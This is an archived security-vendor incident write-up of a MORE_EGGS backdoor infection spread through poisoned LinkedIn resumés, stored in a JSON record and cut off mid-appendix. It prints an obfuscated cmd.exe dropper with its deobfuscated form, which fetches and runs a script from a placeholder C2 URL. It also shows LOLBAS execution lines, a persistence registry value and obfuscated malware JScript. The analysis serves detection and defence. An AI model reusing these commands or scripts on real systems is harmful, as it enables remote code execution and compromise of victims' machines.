{ "id": "fe21bbe5-cff1-459a-a52e-fd37d43312a4", "created_at": "2026-04-06T00:13:54.932817Z", "updated_at": "2026-04-10T13:12:59.97968Z", "deleted_at": null, "sha1_hash": "e37c923c835ff3e50c03111e63681c409ddb74c7", "title": "MORE_EGGS and some LinkedIn resumé spearphishing", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1084188, "plain_text": "MORE_EGGS and some LinkedIn resumé spearphishing\r\nBy Kyle Pellett, Andrew Jerry\r\nPublished: 2022-08-26 · Archived: 2026-04-05 16:14:31 UTC\r\nThe “Great Resignation” has recruiters working overtime scouring LinkedIn resumés for potential candidates.\r\nUnfortunately, some of these resumés are posted by bad actors taking advantage of the situation.\r\nWith a new twist on the MORE_EGGS family of malware, attackers are throwing their names in the ring by submitting\r\npoisoned resumés to job recruiters. The Expel SOC recently spotted a deployment of this technique. The victim’s\r\ncomputer was infected and the malware payload tried to exfiltrate data within a few minutes.\r\nHow we spotted our initial lead\r\nSo, to be honest, malware sometimes acts so quickly that multiple alerts sound before one of our analysts can start the triage\r\nprocess. As you’d imagine, we’re automatically suspicious when we see multiple alerts fire for the same activity. It tells us\r\nthat something strange is happening.\r\nIn this case, we received seven unique Microsoft Defender for Endpoint alerts within a few seconds for activity that clearly\r\n(for reasons explained below) resembled malicious code execution. This tipped our SOC analysts to an attack that was well\r\nunder way — action to contain the host was needed urgently.\r\nAfter this type of malware gains initial access — even if partially blocked by existing security controls — the attack can\r\nspread quickly and deploy code execution, defense evasion, and command and control techniques (in this case the answer\r\nwas D — all of the above).\r\nThis is why a detection strategy that covers all parts of the MITRE ATT\u0026CK framework is so important. In this case,\r\nDefender for Endpoint caught the use of XSL Script Processing first.\r\nCybersecurity is sometimes a battle of humans vs computers, and humans have the disadvantage with respect to time. A lot\r\ncan happen in one “computer second,” and tech like the Expel Workbench™ and Ruxie™ help level the field by\r\ntransforming alert data into intel our SOC analysts can quickly respond to while an attack is under way. (More on how we\r\nuse Defender’s features to our advantage here.)\r\nLet’s take a look at one of several Microsoft Defender for Endpoint alerts we received, how the Expel Workbench helped\r\nguide our analysts to find important information quickly, and how we inferred that this attack was in progress.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 1 of 9\n\nCan you spot the evil here? Here’s what we saw in the recent process activity:\r\nWe see regsvr32 attempting to execute 42981.ocx, which is similar to a technique used by malware (such as QBot\r\nand Lokibot). This is a pretty good giveaway that some malicious code has been executed; it’s written this 42981.ocx\r\nfile to disk, and has now called regsvr32 to run whatever code lies within this DLL file.\r\nThe process arguments of cmd.exe are heavily obfuscated, an indication of an attacker trying to evade detection. One\r\nthing that isn’t obfuscated is johndoe[.]com/kbvbskrvf, a likely suspect for a command and control IOC.\r\nThis alert is looking for discovery activity or “Suspicious sequence of exploration activities.” We see this in the\r\ncommand cmd /v /c nltest /trusted_domains outputting to a text file in a temporary directory, which is consistent\r\nwith identifying domains trusted by this host — quite unusual if you ask us.\r\nmsxsl.exe is a deprecated XML parsing tool with a well documented use case for executing code and bypassing\r\napplication controls — here we see it trying to run an obscurely named text file.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 2 of 9\n\nWe also observe wmic creating the process ie4uinit.exe -basesettings. This is another LOLBAS (living off the land\r\nbinary, script, or library) like msxsl.exe that can easily execute code because it can execute commands from a\r\nspecially prepared ie4uinit.inf file.\r\nOkay, so a lot of bad stuff going on…and so far, not a lot of answers to how this happened. At this point, we declared an\r\nincident, notified our customer, and sent them remediation actions to contain the host and block communications with\r\njohndoe[.]com\r\n(Side note: This is not the real C2 we observed, but in the interest of protecting the anonymity of the user the attackers\r\nimpersonated, we refer to them as johndoe for this blog.)\r\nIdentifying the root cause\r\nThe next question we wanted to answer: How did this malware infection get here?\r\nWe used the customer’s EDR tool to review the timeline and walk back through the chain of events that ultimately led us to\r\nan event involving Outlook.exe.\r\nOUTLOOK.EXE opened the http link hxxps://www.linkedin[.]com/e/v2?e=-1swgqb-l437ev7b-v3\u0026lipi=urn%3Ali%3Apage%3Aemail_email_jobs_new_applicant_01%3Bgo6DX7fyT96rJM8b2IE8Fw%3D%3D\u0026t=plh\u0026ek=email_jobs_new_applicant_01\u0026li=0\u0026m=em\r\nHMeqGo9oXk\r\nThe user clicked on a link in an email from a legitimate sender to a legitimate domain; based on the requested resource, it\r\nappears they were seeking a resumé for a job posting. This is interesting for a couple of reasons.\r\nThe attackers evaded inbox malspam detection using a legitimate email sender\r\nThe document is likely expected, based on a job posting created by the targeted user\r\nThe link in the email also appears legitimate\r\nUnfortunately, our target still fell prey to a malicious phishing document. So what happens if the victim clicks through to\r\ndownload the resumé from LinkedIn?\r\nTo find out, we followed the trail and discovered a PDF crafted to present the viewer with an error. The error is actually an\r\nattempt to lure the victim to an unsafe site where they can download General-Manager-resumé.docx (the file is presented as\r\na Word document).\r\nOf course, this is suspicious to us because we know what happens. But an everyday user recruiting from LinkedIn has\r\nprobably seen resumés that aren’t compatible with their software. This seems to be what the attackers are counting on.\r\nNotably, the domain johndoe[.]com aligns with what the recruiter expects to see based on the applicant’s name. (It was later\r\ndiscovered that the victim was in fact a recruiter and wasn’t aware of a problem with their host after following this funnel.)\r\nWhat happened to the host?\r\nSo what happens when the user clicks on the .docx link? Well, as it turns out, a bunch of things (before the user is finally\r\npresented with a word document). First of all, the file that lands on the victim’s disk is actually a zip archive by the same\r\nname 一 General Manager Resume 1.zip. Once the zip is written to disk, we immediately see it create John Doe CV.lnk.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 3 of 9\n\nAt this point we see a familiar code execution from one of our alerts:\r\nObfuscated\r\n\"cmd.exe\" /v /c set \"979113wEX=set\" \u0026\u0026 call set \"979113gn=%979113wEX:~0,1%\" \u0026\u0026 (for %p in (c) do @set\r\n\"979113QCH=%~p\") \u0026\u0026 !979113gn!et \"979113XI=e\" \u0026\u0026 !979113gn!!979113XI!t \"979113rKw=$w\" \u0026\u0026 s!979113XI!t\r\n\"979113bCj=i\" \u0026\u0026 set \"979113FL=a\" \u0026\u0026 s!979113XI!t \"979113jnI=t\" \u0026\u0026 !979113gn!et \"979113pHq=d\" \u0026\u0026 s!979113XI!t\r\n\"979113mJ=.\" \u0026\u0026 s!979113XI!t \"979113MAn=init\" \u0026\u0026 set \"979113TQ=s!979113bCj!\" \u0026\u0026 s!979113XI!t\r\n\"979113Jq=s!979113XI!tt!979113bCj!ngs\" \u0026\u0026 s!979113XI!t \"979113Pnd=.!979113bCj!nf\" \u0026\u0026 set\r\n\"979113PN=i!979113XI!u!979113MAn!!979113Pnd!\" \u0026\u0026 s!979113XI!t \"979113ED= = \" \u0026\u0026 !979113gn!et\r\n\"979113AS=s!979113bCj!gnatur!979113XI!!979113ED!\" \u0026\u0026 s!979113XI!t \"979113vY=all!979113mJ!win\" \u0026\u0026 set\r\n\"979113ixY=de\" \u0026\u0026 s!979113XI!t \"979113Dtp=ch\" \u0026\u0026 call !979113gn!!979113XI!t\r\n\"979113YM=C:Users\u003cRedacted\u003eAppDataRoamingM!979113bCj!crosoft\" \u0026\u0026 s!979113XI!t \"979113nT=!979113YM!!979113PN!\"\r\n\u0026\u0026 set \"979113of=\"^\" \u0026\u0026 (for %h in (\"[vers!979113bCj!on]\" \"!979113AS!!979113rKw!!979113bCj!ndows nt$\" \"\r\n[!979113ixY!stinationdirs]\" \"F00BE!979113ED!01\" \"[!979113ixY!faultinst!979113vY!dows7]\"\r\n\"UnRegist!979113XI!rOCXs!979113ED!3DF1\" \"!979113pHq!elfiles!979113XI!F00BE\" \"[3DF1]\"\r\n\"%11%scRo%979113yd%j,NI,%979113RHZ%%979113BCS%%979113BCS%p%979113zL%%979113rf%%979113rf%johndoe.com/kbvbskrvf\"\r\n\"[F00BE]\" \"ieu%979113GjL%!979113Pnd!\" \"[strings]\" \"979113GjL=!979113MAn!\" \"979113BCS=t\" \"servicename' '\"\r\n\"979113RHZ=h\" \"979113zL=:\" \"979113rf=/\" \"shorthvcname= \" \"979113FPK=com\" \"979113yd=b\") do @e!979113Dtp!o\r\n%~h)\u003e\"!979113nT!\" \u0026\u0026 set \"979113jgm=ie4uinit.exe\" \u0026\u0026 call copy /Y C:windowssystem32!979113jgm! \"!979113YM!\" \u003e\r\nnul \u0026\u0026 st!979113FL!rt \"\" /MIN wm!979113bCj!c proc!979113XI!ss call cr!979113XI!ate \"!979113YM!!979113jgm! -\r\nbas!979113XI!!979113Jq!\"\r\nDeobfuscated\r\n\"cmd.exe\" /v /c (for h in (\"[version]\" \"signature = $windows nt$\" \"[destinationdirs]\" \" 01 = 01\" \"\r\n[defaultinstall.windows7]\" \"UnRegisterOCXs = 3DF1\" \"delfileseF00BE\" \"[3DF1]\"\r\n\"11scRobj,NI,http://johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieuinit.inf\" \"[strings]\" \"init=init\" \"t=t\" \"servicename'\r\n'\" \"h=h\" \":=:\" \"/=/\" \"shorthvcname= \" \"979113FPK=com\" \"b=b\") do @echo\r\n~h)\u003e\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft.infieuinit.inf\" \u0026\u0026 set \"ie4uinit.exe=ie4uinit.exe\" \u0026\u0026 call copy\r\n/Y C:windowssystem32ie4uinit.exe \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft\" \u003e nul \u0026\u0026 stirt \"\" /MIN wmic process\r\ncall create \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe -basesettings\"\r\nThis command accomplishes a few things. It:\r\npoints to http://johndoe[.]com/kbvbskrvf, a malicious resource hosted on the C2 domains UnRegisterOCXs to fetch\r\nand run the malicious resource using scrobj\r\nwrites it as the file “ieuinit.inf” and puts it in C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft.infieuinit.inf\r\ncopies the legitimate ie4uinit.exe from C:windowssystem32ie4uinit.exe and uses WMIC to create the process in\r\nC:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe\r\nThis is indicative of the fileless malware execution technique used by GANDCAB, described here. (Further credit to the\r\nBOHOPS description of misuse of .inf files, UnRegisterOCXSection and scrobj.dll.)\r\nWhenever we see legitimate Windows binaries where no vendors have determined the hash for ie4uinit.exe to be malicious,\r\ntheir occurrence outside the normal/expected path raises suspicions. According to VirusTotal, the file isn’t signed, but\r\nappears to be copywritten by Microsoft and is a component of Internet Explorer.\r\nWithin a millisecond of execution of the obfuscated cmd.exe process, we see the following wmic process.\r\nwmic process call create \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe -basesettings\"\r\nAnother signed binary, msxsl.exe, is also placed in the AppdataRoaming directory. The attackers now have two signed\r\nbinaries at their disposal in an unprotected location: C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftmsxsl.exe.\r\nBoth ieuninit.exe and msxsl.exe were placed in AppdataRoaming for later use. All of this happened in seconds ーwhile the\r\nvictim was waiting for the resumé to load ー and we see one more command before the victim is presented with a Word doc\r\nー the decoy resumé).\r\nThe signed binary is in an unusual location ー C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe ー and is using\r\nwmic to adjust token privileges to allow the following privileges to the user’s access token:\r\nShutdown, Undock, IncreaseWorkingSet, TimeZone.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 4 of 9\n\nThis was followed by the execution of a script by ie4uinit.exe out of AppDataRomaing. The following AMSI content was\r\nrecorded.\r\nSee Appendix A:\r\nAt first glance, this looks like an obfuscated javascript with function calls containing the following human-readable\r\noperations:\r\nreturn String.fromCharCode\r\nreturn new ActiveXObject\r\nreturn Math.floor(Math.random() * 65536\r\n.writeText\r\n.saveToFile\r\n{if (typeof WScript === ‘object’) {return true;\r\nRegRead\r\nGetObject\r\n.Create\r\nWithout completely deobfuscating this, we can guess the intent is to run a function after obfuscating the data with\r\nString.fromCharCode. This works by naming hexadecimal values as Unicode values, which are finally converted to\r\ncharacters. Here’s the slightly deobfuscated pretty version:\r\nSee Appendix B:\r\nThe script then takes the string and writes an ActiveXobject with what’s expected to be a WScript file:\r\nlgnsyjcm9801.saveToFile(lgnsyjcm4315);\r\nlgnsyjcm9801.close();\r\nlgnsyjcm963 = 1;\r\n} catch (lgnsyjcm265) {\r\nreturn 0;\r\n}\r\nreturn lgnsyjcm963;\r\n}\r\nfunction lgnsyjcm400() {\r\ntry {\r\nlgnsyjcm0147.lgnsyjcm786;\r\nreturn true;\r\n} catch (lgnsyjcm27) {\r\nif (typeof WScript === \"object\") {\r\nWe then see an attempt at some cryptographic function based on the presence of return Math.floor(Math.random() *\r\n65536. Open-source intelligence suggests this function is generating a pseudo-random number either used for C2 traffic\r\nencryption or as a GUID to uniquely identify the machine for eventual extortion or ransomware reasons.\r\nThere’s also evidence of an intended registry-read event:\r\nfunction lgnsyjcm206() {\r\nvar lgnsyjcm681;\r\nvar lgnsyjcm4718;\r\ntry {\r\nlgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656(\"EdT:2)?+6**kP\u003eYj\", lgnsyjcm8, lgnsyjcm4));\r\nlgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656(\"rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I\u003e\r\n(,I5,dv\u0026KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE\", lgnsyjcm8, lgnsyjcm4));\r\nif (!lgnsyjcm4718) {\r\nreturn false;\r\n}\r\nThis can be deobfuscated further, but the next event we see on the host is the decoy document being created and executed\r\nusing wmi:\r\nScript content: IWshShell3.Environment(\"PROCESS\");\r\nIWshEnvironment.Item(\"APPDATA\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 5 of 9\n\n_Stream.WriteText(\"╨╧αí▒ß\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\");\r\nThe user is now presented with a Word document, and nothing appears unusual. Thanks to AMSI content, we can see the\r\n6222.doc file was executed and an ocx file is created.\r\nScript Content: IWshShell3.Environment(\"PROCESS\");\r\nIWshEnvironment.Item(\"APPDATA\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\n_Stream.WriteText(\"╨╧αí▒ß\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\");\r\n_Stream.Close();\r\nIWshShell3.RegRead(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp PathsWinword.exe\");\r\nISWbemServicesEx.Get(\"Win32_Process\");\r\nISWbemObjectEx._01000001(\"C:Program FilesMicrosoft OfficeRootOffice16WIN\", \"Unsupported parameter type\r\n00000001\", \"Unsupported parameter type 00000001\", \"0\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\n_Stream.WriteText(\"MZÉ\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft42981.ocx\")\r\n42981.ocx is now executed by regsrv32.exe, a common tactic used by malicious Word document authors.\r\nScript Content: Win32_Process.GetObject();\r\nSetPropValue.CommandLine(\"C:Program FilesMicrosoft OfficeRootOffice16WINWORD.EXE\r\n\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\"\");\r\nSetPropValue.CurrentDirectory(\"Unsupported parameter type 00000001\");\r\nSetPropValue.ProcessStartupInformation(\"Unsupported parameter type 00000001\");\r\nWin32_Process.ExecMethod(Create);\r\nWin32_Process.GetObject();\r\nSetPropValue.CommandLine(\"regsvr32 /s /n /i:Login \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft42981.ocx\"\");\r\nAfter executing the .ocx file with regsvr32 we see a registry modification that appears to be a text file in the AppData\r\ndirectory. While we don’t have the contents of the text file, we can assume this is a persistence mechanism.\r\n\"Registry Key: S-1-12-1-3569878806-1151277312-3324287152-3804517278Environment\r\nValue Name: UserInitMprLogonScript\r\nValue Data: cscripT -e:jsCript \"\"%APPDATA%Microsoft46BA2C64FFD9F546.txt\"\"\r\nValue Type: RegistryValueEntity\"\r\nRegsvr32 also launches the msxsl.exe dropped by the malware to execute the file FC22A0E0F890CC.txt.\r\n\"Script Content: Win32_Process.GetObject();\r\nSetPropValue.CommandLine(\"\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftmsxsl.exe FC22A0E0F890CC.txt\r\nFC22A0E0F890CC.txt\"\");\r\nAfter this we see evidence of discovery commands being executed via wmi by the parent process msxsl.exe. Without the\r\ncontents of the .txt file we can’t really know for sure what’s happening. But based on OSINT, we can speculate that the .txt\r\nfile is the MORE_EGGS JScript because it behaves like MORE_EGGS.\r\nIf you’re wondering why we didn’t do further analysis … good question. We were hindered a bit without file acquisition and\r\nwere limited to host timelines. MSDFE did a pretty good job of recording.\r\nmsxsl.exe executed the WMI query 'SELECT Version FROM CIM_Datafile Where Name = 'C:\\windows\\notepad.exe''\r\nmsxsl.exe executed the WMI query 'SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled =\r\nTrue'\r\nmsxsl.exe executed the WMI query 'SELECT * FROM Win32_Process'\r\ntypeperf.exe \"SystemProcessor Queue Length\" -si 180 -sc 1\r\nFollowing some system discovery activity, we see HTTP POSTs to the C2 domain webdirectoryuk[.]com. See Appendix C.\r\nThe wmi process then executes the cmd.exe command under the victim’s user context to run the nltest command to identify\r\ntrusted domains and write the output to a text file. This was the final action performed by the malware prior to host\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 6 of 9\n\ncontainment.\r\ncmd /v /c nltest /trusted_domains \u003e \"C:Users\u003cRedacted\u003eAppDataLocalTemp55337.txt\" 2\u003e\u00261\r\nBased on open source intelligence research, we suspect 55337.txt is the MORE_EGGS backdoor. This blog explains the\r\ncapability of this backdoor, which includes command execution “via cmd.exe /C” among other functionality:\r\nCommand Description\r\nd\u0026exec Download and execute an executable (.exe or .dll).\r\nmore_eggs Delete the current More_eggs and replace it.\r\nGtfo Uninstall activity.\r\nmore_onion Execute a script.\r\nvia_c Run a command using “cmd.exe /C”.\r\nUnfortunately, we were unable to acquire any of the files we described. However, given the behaviors performed on the host\r\nwe were able to tell the story of how a LinkedIn resumé phishing document resulted in a MORE_EGGS backdoor.\r\nEven without acquiring the file, our analysis of the activity aligns with the financially motivated cybercrime gangs FIN6,\r\nEvilnum, or the Cobalt Group. It’s difficult to attribute activity to a specific group, but we saw LinkedIn used in 2021 to\r\ndeliver MORE_EGGS ー with one key difference. The first iteration of threat groups harnessing LinkedIn for this purpose\r\nwas an inverse of the victim-attacker relationship. Instead of recruiters expecting resumés, the FIN6 group was posing as\r\nemployers and sending fake job offers to their victims over LinkedIn. Based on their prior use of LinkedIn, it’s quite\r\npossible this is the work of FIN6 or a copycat.\r\nEither way, credit should be given where due. Financially motivated threat actors aren’t playing around and the victim user\r\nthis article was based around wasn’t aware that downloading a resumés from LinkedIn left a backdoor on their machine.\r\nSummary of attack lifecycle:\r\nRemediation: Initial remediation focused on stopping the bleeding, containing the host, and reimaging the box to a known\r\ngood image, ensuring no remnants were left over. We also recommended blocking the C2 domain webdirectoryuk[.]com.\r\nResilience: Even though we detected and reported this incident quickly, the bottom line is that malicious code executed on\r\none of our customer-managed devices on their network. Whenever we can directly point to environment controls to enable\r\ndefenders or disrupt attackers, we include them in the incident findings report. In this incident we provided the customer\r\nwith the following resilience actions:\r\nDisrupt attackers:\r\nPhishing education for users, specifically from trusted sources (LinkedIn).\r\nConfigure Jscript (.js, .jse), Windows Scripting Files (.wsf, .wsh) and HTML for application (.hta) files to open with\r\nNotepad.\r\nBy associating these file extensions with Notepad you mitigate common remote code execution techniques.\r\nNote that PowerShell files (.ps1) already open by default in Notepad.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 7 of 9\n\nEnable Defenders:\r\nIncrease visibility into PowerShell activity by taking advantage of logging capabilities. Module and ScriptBlock\r\nlogging provide greater visibility into potential PowerShell attacks.\r\nGood: Ensure PowerShell 3.0 (at least) is installed on all Windows systems and enable PowerShell Module\r\nlogging.\r\nBetter: Ensure PowerShell 5.0 (at least) is installed on all Windows systems and enable PowerShell\r\nScriptBlock logging and transcription logging.\r\nBest: Ensure PowerShell 5.0 (at least) is installed on all Windows systems, enable PowerShell ScriptBlock\r\nlogging and transcription logging; also make sure Microsoft-Windows-PowerShell%4Operational.evtx is at\r\nleast 1 GB in size on all systems to aid in an investigation.\r\nAppendix A\r\nScript content: function anonymous() { function lgnsyjcm9469(lgnsyjcm2900) {return\r\nlgnsyjcm2900.length;}function lgnsyjcm262(lgnsyjcm6080){return String.fromCharCode(lgnsyjcm6080);}function\r\nlgnsyjcm56(lgnsyjcm458) {var lgnsyjcm62 = [];var lgnsyjcm356 = [];var lgnsyjcm144 = \"\";var lgnsyjcm1495;var\r\nlgnsyjcm020;var lgnsyjcm4110 = 0;lgnsyjcm62[0x80] = 0x00C7;lgnsyjcm62[0x81] = 0x00FC;lgnsyjcm62[0x82] =\r\n0x00E9;lgnsyjcm62[0x83] = 0x00E2;lgnsyjcm62[0x84] = 0x00E4;lgnsyjcm62[0x85] = 0x00E0;lgnsyjcm62[0x86] =\r\n0x00E5;lgnsyjcm62[0x87] = 0x00E7;lgnsyjcm62[0x88] = 0x00EA;lgnsyjcm62[0x89] = 0x00EB;lgnsyjcm62[0x8A] =\r\n0x00E8;lgnsyjcm62[0x8B] = 0x00EF;lgnsyjcm62[0x8C] = 0x00EE;lgnsyjcm62[0x8D] = 0x00EC;lgnsyjcm62[0x8E] =\r\n0x00C4;lgnsyjcm62[0x8F] = 0x00C5;lgnsyjcm62[0x90] = 0x00C9;lgnsyjcm62[0x91] = 0x00E6;lgnsyjcm62[0x92] =\r\n0x00C6;lgnsyjcm62[0x93] = 0x00F4;lgnsyjcm62[0x94] = 0x00F6;lgnsyjcm62[0x95] = 0x00F2;lgnsyjcm62[0x96] =\r\n0x00FB;lgnsyjcm62[0x97] = 0x00F9;lgnsyjcm62[0x98] = 0x00FF;lgnsyjcm62[0x99] = 0x00D6;lgnsyjcm62[0x9A] =\r\n0x00DC;lgnsyjcm62[0x9B] = 0x00A2;lgnsyjcm62[0x9C] = 0x00A3;lgnsyjcm62[0x9D] = 0x00A5;lgnsyjcm62[0x9E] =\r\n0x20A7;lgnsyjcm62[0x9F] = 0x0192;lgnsyjcm62[0xA0] = 0x00E1;lgnsyjcm62[0xA1] = 0x00ED;lgnsyjcm62[0xA2] =\r\n0x00F3;lgnsyjcm62[0xA3] = 0x00FA;lgnsyjcm62[0xA4] = 0x00F1;lgnsyjcm62[0xA5] = 0x00D1;lgnsyjcm62[0xA6] =\r\n0x00AA;lgnsyjcm62[0xA7] = 0x00BA;lgnsyjcm62[0xA8] = 0x00BF;lgnsyjcm62[0xA9] = 0x2310;lgnsyjcm62[0xAA] =\r\n0x00AC;lgnsyjcm62[0xAB] = 0x00BD;lgnsyjcm62[0xAC] = 0x00BC;lgnsyjcm62[0xAD] = 0x00A1;lgnsyjcm62[0xAE] =\r\n0x00AB;lgnsyjcm62[0xAF] = 0x00BB;lgnsyjcm62[0xB0] = 0x2591;lgnsyjcm62[0xB1] = 0x2592;lgnsyjcm62[0xB2] =\r\n0x2593;lgnsyjcm62[0xB3] = 0x2502;lgnsyjcm62[0xB4] = 0x2524;lgnsyjcm62[0xB5] = 0x2561;lgnsyjcm62[0xB6] =\r\n0x2562;lgnsyjcm62[0xB7] = 0x2556;lgnsyjcm62[0xB8] = 0x2555;lgnsyjcm62[0xB9] = 0x2563;lgnsyjcm62[0xBA] =\r\n0x2551;lgnsyjcm62[0xBB] = 0x2557;lgnsyjcm62[0xBC] = 0x255D;lgnsyjcm62[0xBD] = 0x255C;lgnsyjcm62[0xBE] =\r\n0x255B;lgnsyjcm62[0xBF] = 0x2510;lgnsyjcm62[0xC0] = 0x2514;lgnsyjcm62[0xC1] = 0x2534;lgnsyjcm62[0xC2] =\r\n0x252C;lgnsyjcm62[0xC3] = 0x251C;lgnsyjcm62[0xC4] = 0x2500;lgnsyjcm62[0xC5] = 0x253C;lgnsyjcm62[0xC6] =\r\n0x255E;lgnsyjcm62[0xC7] = 0x255F;lgnsyjcm62[0xC8] = 0x255A;lgnsyjcm62[0xC9] = 0x2554;lgnsyjcm62[0xCA] =\r\n0x2569;lgnsyjcm62[0xCB] = 0x2566;lgnsyjcm62[0xCC] = 0x2560;lgnsyjcm62[0xCD] = 0x2550;lgnsyjcm62[0xCE] =\r\n0x256C;lgnsyjcm62[0xCF] = 0x2567;lgnsyjcm62[0xD0] = 0x2568;lgnsyjcm62[0xD1] = 0x2564;lgnsyjcm62[0xD2] =\r\n0x2565;lgnsyjcm62[0xD3] = 0x2559;lgnsyjcm62[0xD4] = 0x2558;lgnsyjcm62[0xD5] = 0x2552;lgnsyjcm62[0xD6] =\r\n0x2553;lgnsyjcm62[0xD7] = 0x256B;lgnsyjcm62[0xD8] = 0x256A;lgnsyjcm62[0xD9] = 0x2518;lgnsyjcm62[0xDA] =\r\n0x250C;lgnsyjcm62[0xDB] = 0x2588;lgnsyjcm62[0xDC] = 0x2584;lgnsyjcm62[0xDD] = 0x258C;lgnsyjcm62[0xDE] =\r\n0x2590;lgnsyjcm62[0xDF] = 0x2580;lgnsyjcm62[0xE0] = 0x03B1;lgnsyjcm62[0xE1] = 0x00DF;lgnsyjcm62[0xE2] =\r\n0x0393;lgnsyjcm62[0xE3] = 0x03C0;lgnsyjcm62[0xE4] = 0x03A3;lgnsyjcm62[0xE5] = 0x03C3;lgnsyjcm62[0xE6] =\r\n0x00B5;lgnsyjcm62[0xE7] = 0x03C4;lgnsyjcm62[0xE8] = 0x03A6;lgnsyjcm62[0xE9] = 0x0398;lgnsyjcm62[0xEA] =\r\n0x03A9;lgnsyjcm62[0xEB] = 0x03B4;lgnsyjcm62[0xEC] = 0x221E;lgnsyjcm62[0xED] = 0x03C6;lgnsyjcm62[0xEE] =\r\n0x03B5;lgnsyjcm62[0xEF] = 0x2229;lgnsyjcm62[0xF0] = 0x2261;lgnsyjcm62[0xF1] = 0x00B1;lgnsyjcm62[0xF2] =\r\n0x2265;lgnsyjcm62[0xF3] = 0x2264;lgnsyjcm62[0xF4] = 0x2320;lgnsyjcm62[0xF5] = 0x2321;lgnsyjcm62[0xF6] =\r\n0x00F7;lgnsyjcm62[0xF7] = 0x2248;lgnsyjcm62[0xF8] = 0x00B0;lgnsyjcm62[0xF9] = 0x2219;lgnsyjcm62[0xFA] =\r\n0x00B7;lgnsyjcm62[0xFB] = 0x221A;lgnsyjcm62[0xFC] = 0x207F;lgnsyjcm62[0xFD] = 0x00B2;lgnsyjcm62[0xFE] =\r\n0x25A0;lgnsyjcm62[0xFF] = 0x00A0;do {lgnsyjcm1495 = lgnsyjcm458[lgnsyjcm4110];if (lgnsyjcm1495 \u003c 128)\r\n{lgnsyjcm020 = lgnsyjcm1495;}else {lgnsyjcm020 =\r\nlgnsyjcm62[lgnsyjcm1495];}lgnsyjcm356.push(lgnsyjcm262(lgnsyjcm020));lgnsyjcm4110 += 1;} while (lgnsyjcm4110 \u003c\r\nlgnsyjcm9469(lgnsyjcm458));lgnsyjcm144 = lgnsyjcm356.join(\"\");return lgnsyjcm144;}function\r\nlgnsyjcm15(lgnsyjcm287) {return new ActiveXObject(lgnsyjcm287);}function lgnsyjcm7522() {return\r\nMath.floor(Math.random() * 65536);}function lgnsyjcm4677(lgnsyjcm387, lgnsyjcm4315, lgnsyjcm7403, lgnsyjcm1632,\r\nlgnsyjcm4299){var lgnsyjcm963;try {var lgnsyjcm5310 = lgnsyjcm598(lgnsyjcm387);var lgnsyjcm081 =\r\nlgnsyjcm894(lgnsyjcm5310, lgnsyjcm7403, lgnsyjcm1632);lgnsyjcm5310 = 0;if (lgnsyjcm4299 === 1 \u0026\u0026 lgnsyjcm081[0]\r\n!== 0x4D \u0026\u0026 lgnsyjcm081[1] !== 0x5a){return 0;}var lgnsyjcm9801 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm28,\r\nlgnsyjcm8, lgnsyjcm4));lgnsyjcm9801.open();lgnsyjcm9801.position = 0;lgnsyjcm9801.type = 2;lgnsyjcm9801.charset\r\n= 437;lgnsyjcm9801.writeText(lgnsyjcm56(lgnsyjcm081));lgnsyjcm081 =\r\n0;lgnsyjcm9801.saveToFile(lgnsyjcm4315);lgnsyjcm9801.close();lgnsyjcm963 = 1;} catch (lgnsyjcm265) {return\r\n0;}return lgnsyjcm963;}function lgnsyjcm400() {try {lgnsyjcm0147.lgnsyjcm786;return true;} catch(lgnsyjcm27)\r\n{if (typeof WScript === 'object') {return true;}lgnsyjcm481();}}function lgnsyjcm206(){var lgnsyjcm681;var\r\nlgnsyjcm4718;try{lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656('EdT:2)?+6**kP\u003eYj', lgnsyjcm8, lgnsyjcm4));lgnsyjcm4718\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 8 of 9\n\n= lgnsyjcm681.RegRead(lgnsyjcm2656('rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I\u003e\r\n(,I5,dv\u0026KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE', 